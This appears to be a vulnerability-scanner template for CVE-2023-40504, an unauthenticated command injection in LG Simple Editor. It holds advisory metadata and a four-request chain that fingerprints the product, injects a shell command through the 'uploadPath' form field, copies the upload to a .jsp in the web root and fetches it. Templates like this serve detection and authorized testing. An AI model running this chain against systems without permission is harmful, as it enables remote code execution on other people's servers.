id: CVE-2023-40504 info: name: LG Simple Editor <= v3.21.0 - Command Injection author: s4e-io severity: critical description: | LG Simple Editor readVideoInfo Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of LG Simple Editor. Authentication is not required to exploit this vulnerability. The specific flaw exists within the readVideoInfo method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. impact: | Unauthenticated attackers can execute arbitrary commands with SYSTEM privileges through the readVideoInfo method by injecting malicious strings in system calls, potentially compromising the entire LG Simple Editor server and connected systems. remediation: | Update LG Simple Editor to a version newer than 3.21.0 that properly validates user input and prevents command injection in the readVideoInfo method. reference: - https://www.zerodayinitiative.com/advisories/ZDI-23-1208/ - https://packetstormsecurity.com/files/180171/LG-Simple-Editor-3.21.0-Command-Injection.html - https://0day.today/exploit/39719 - https://www.usom.gov.tr/bildirim/tr-24-0417 - https://nvd.nist.gov/vuln/detail/CVE-2023-40504 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-40504 cwe-id: CWE-78 epss-score: 0.91198 epss-percentile: 0.99665 metadata: max-request: 1 verified: true vendor: lg product: simple_editor fofa-query: icon_hash="159985907" tags: cve,cve2023,lg,simple-editor,intrusive,rce,file-upload,vuln variables: filename: "{{rand_base(12)}}" flow: http(1) && http(2) && http(3) && http(4) http: - raw: - | GET /simpleeditor/common/commonReleaseNotes.do HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body,"LG Simple Editor")' - 'status_code == 200' condition: and internal: true - raw: - | POST /simpleeditor/imageManager/uploadVideo.do HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="uploadVideo"; filename="{{filename}}.bmp" / ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="uploadPath" /"&cmd&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del {{filename}}.bmp&/../" ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="uploadFile_x" 1 ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="uploadFile_width" 1 ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="uploadFile_height" 1 ------WebKitFormBoundary7MA4YWxkTrZu0gW-- matchers: - type: dsl dsl: - 'contains_all(body, "errorCode","errorMessage","fail")' - 'contains(content_type, "application/json")' - 'status_code == 200' condition: and internal: true - raw: - | POST /simpleeditor/fileSystem/makeDetailContent.do HTTP/1.1 Host: {{Hostname}} Content-Type: application/json Accept: application/json {"command":"cp","option":"-f","srcPath":"/{{filename}}_original.bmp","destPath":"/{{filename}}.jsp"} matchers: - type: dsl dsl: - 'contains_all(body, "errorCode","errorMessage","data","success")' - 'contains(content_type, "application/json")' - 'status_code == 200' condition: and internal: true - raw: - | GET /simpleeditor/{{filename}}.jsp HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and # digest: 490a004630440220455cc28a080473c578074bbfbd81622dba48734d06d8e55860ad45008b3b53d502204675312f5e26c9fb15c0eec1e697f5a06ed3b006eef0d7978afbdfae28dd7b00:922c64590222798bb761d5b6d8e72950